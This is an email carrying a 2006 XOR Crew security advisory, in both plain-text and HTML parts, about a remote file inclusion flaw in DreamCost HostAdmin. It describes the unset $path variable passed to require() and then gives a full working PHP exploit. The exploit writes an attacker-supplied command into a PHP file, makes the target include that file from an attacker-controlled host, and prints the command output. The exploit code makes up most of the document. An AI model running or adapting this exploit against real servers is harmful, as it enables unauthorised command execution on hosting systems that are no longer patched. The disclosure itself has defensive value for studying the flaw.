------=_Part_3553_5345776.1140054808635
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
XOR Crew :: Security Advisory                                        =20
       2/11/2006
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
HostAdmin - Remote Command Execution Vulnerability
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

:: Summary

      Vendor       :  DreamCost
      Vendor Site  :  http://www.dreamcost.com/
      Product(s)   :  HostAdmin - Automated Hosting Suite
      Version(s)   :  All
      Severity     :  Medium/High
      Impact       :  Remote Command Execution
      Release Date :  2/11/2006
      Credits      :  ReZEN (rezen (a) xorcrew (.) net)

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

I. Description

By creating a product that integrates with the major payment
processors, registrars,
and provisioning tools on the market, HostAdmin gives your hosting
company the power
to bill and activate hosting accounts in real-time, even while you
sleep at night!


=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

II. Synopsis

There is a remote file inclusion vulnerability that allows for remote
command execution
in the index.php file.  The bug is here on lines 5, 6, and 7:

require("setup.php");
require("functions.php");
require("db.conf");
require($path . "que.php");
require($path . "provisioning_manager.php");
require($path . "registrar_manager.php");

the $path variable is not set prior to being used in the require() function=
.
The vendor is no longer offering updates for this software.

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Exploit code:

-----BEGIN-----

<?php
/*
HostAdmin Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN
*/

$cmd =3D $_POST["cmd"];
$turl =3D $_POST["turl"];
$hurl =3D $_POST["hurl"];

$form=3D "<form method=3D\"post\" action=3D\"".$PHP_SELF."\">"
    ."turl:<br><input type=3D\"text\" name=3D\"turl\" size=3D\"90\"
value=3D\"".$turl."\"><br>"
    ."hurl:<br><input type=3D\"text\" name=3D\"hurl\" size=3D\"90\"
value=3D\"".$hurl."\"><br>"
    ."cmd:<br><input type=3D\"text\" name=3D\"cmd\" size=3D\"90\"
value=3D\"".$cmd."\"><br>"
    ."<input type=3D\"submit\" value=3D\"Submit\" name=3D\"submit\">"
    ."</form><HR WIDTH=3D\"650\" ALIGN=3D\"LEFT\">";

if (!isset($_POST['submit']))
{

echo $form;

}else{

$file =3D fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);

$file =3D fopen ($turl.$hurl, "r");
if (!$file) {
    echo "<p>Unable to get output.\n";
    exit;
}

echo $form;

while (!feof ($file)) {
    $line .=3D fgets ($file, 1024)."<br>";
    }
$tpos1 =3D strpos($line, "++BEGIN++");
$tpos2 =3D strpos($line, "++END++");
$tpos1 =3D $tpos1+strlen("++BEGIN++");
$tpos2 =3D $tpos2-$tpos1;
$output =3D substr($line, $tpos1, $tpos2);
echo $output;

}
?>


------END------

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

------=_Part_3553_5345776.1140054808635
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

<pre>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>XOR Crew :: Security Advisory=
                                                 2/11/2006<br>=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D
<br>HostAdmin - Remote Command Execution Vulnerability<br>=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D<br><a href=3D"http://www.xorcrew.net/">http://www.xor=
crew.net/</a><br><a href=3D"http://www.xorcrew.net/ReZEN">
http://www.xorcrew.net/ReZEN</a><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br=
><br>:: Summary<br><br>      Vendor       :  DreamCost<br>      Vendor Site=
  :  <a href=3D"http://www.dreamcost.com/">
http://www.dreamcost.com/</a><br>      Product(s)   :  HostAdmin - Automate=
d Hosting Suite<br>      Version(s)   :  All<br>      Severity     :  Mediu=
m/High<br>      Impact       :  Remote Command Execution<br>      Release D=
ate :  2/11/2006
<br>      Credits      :  ReZEN (rezen (a) xorcrew (.) net)<br><br>=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>I. Description<br><br>By creating a p=
roduct that integrates with the major payment processors, registrars,=20
<br>and provisioning tools on the market, HostAdmin gives your hosting comp=
any the power <br>to bill and activate hosting accounts in real-time, even =
while you sleep at night!<br><br><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
<br><br>II. Synopsis<br><br>There is a remote file inclusion vulnerability =
that allows for remote command execution<br>in the index.php file.  The bug=
 is here on lines 5, 6, and 7: <br><br>require(&quot;setup.php&quot;);<br>
require(&quot;functions.php&quot;);<br>require(&quot;db.conf&quot;);<br>req=
uire($path . &quot;que.php&quot;);<br>require($path . &quot;provisioning_ma=
nager.php&quot;);<br>require($path . &quot;registrar_manager.php&quot;);
<br><br>the $path variable is not set prior to being used in the require() =
function.<br>The vendor is no longer offering updates for this software.<br=
><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
<br><br>Exploit code:<br><br>-----BEGIN-----<br><br>&lt;?php<br>/*<br>HostA=
dmin Remote File Inclusion Exploit c0ded by ReZEN<br>Sh0uts: <a href=3D"htt=
p://xorcrew.net">xorcrew.net</a>, ajax, gml, #subterrain, My gf<br>url: =20
<a href=3D"http://www.xorcrew.net/ReZEN">http://www.xorcrew.net/ReZEN</a><b=
r>*/<br><br>$cmd =3D $_POST[&quot;cmd&quot;];<br>$turl =3D $_POST[&quot;tur=
l&quot;];<br>$hurl =3D $_POST[&quot;hurl&quot;];<br><br>$form=3D &quot;&lt;=
form method=3D\&quot;post\&quot; action=3D\&quot;&quot;.$PHP_SELF.&quot;\&q=
uot;&gt;&quot;
<br>    .&quot;turl:&lt;br&gt;&lt;input type=3D\&quot;text\&quot; name=3D\&=
quot;turl\&quot; size=3D\&quot;90\&quot; value=3D\&quot;&quot;.$turl.&quot;=
\&quot;&gt;&lt;br&gt;&quot;<br>    .&quot;hurl:&lt;br&gt;&lt;input type=3D\=
&quot;text\&quot; name=3D\&quot;hurl\&quot; size=3D\&quot;90\&quot; value=
=3D\&quot;&quot;.$hurl.&quot;\&quot;&gt;&lt;br&gt;&quot;
<br>    .&quot;cmd:&lt;br&gt;&lt;input type=3D\&quot;text\&quot; name=3D\&q=
uot;cmd\&quot; size=3D\&quot;90\&quot; value=3D\&quot;&quot;.$cmd.&quot;\&q=
uot;&gt;&lt;br&gt;&quot;<br>    .&quot;&lt;input type=3D\&quot;submit\&quot=
; value=3D\&quot;Submit\&quot; name=3D\&quot;submit\&quot;&gt;&quot;
<br>    .&quot;&lt;/form&gt;&lt;HR WIDTH=3D\&quot;650\&quot; ALIGN=3D\&quot=
;LEFT\&quot;&gt;&quot;;<br><br>if (!isset($_POST['submit'])) <br>{<br><br>e=
cho $form;<br><br>}else{<br><br>$file =3D fopen (&quot;test.txt&quot;, &quo=
t;w+&quot;);
<br><br>fwrite($file, &quot;&lt;?php system(\&quot;echo ++BEGIN++\&quot;); =
system(\&quot;&quot;.$cmd.&quot;\&quot;); <br>system(\&quot;echo ++END++\&q=
uot;); ?&gt;&quot;);<br>fclose($file);<br><br>$file =3D fopen ($turl.$hurl,=
 &quot;r&quot;);
<br>if (!$file) {<br>    echo &quot;&lt;p&gt;Unable to get output.\n&quot;;=
<br>    exit;<br>}<br><br>echo $form;<br><br>while (!feof ($file)) {<br>   =
 $line .=3D fgets ($file, 1024).&quot;&lt;br&gt;&quot;;<br>    }<br>$tpos1 =
=3D strpos($line, &quot;++BEGIN++&quot;);
<br>$tpos2 =3D strpos($line, &quot;++END++&quot;);<br>$tpos1 =3D $tpos1+str=
len(&quot;++BEGIN++&quot;);<br>$tpos2 =3D $tpos2-$tpos1;<br>$output =3D sub=
str($line, $tpos1, $tpos2);<br>echo $output;<br><br>}<br>?&gt;<br><br><br>-=
-----END------
<br><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>IV. Greets :&gt;<br><b=
r>All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend=
.<br><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
</pre>

------=_Part_3553_5345776.1140054808635--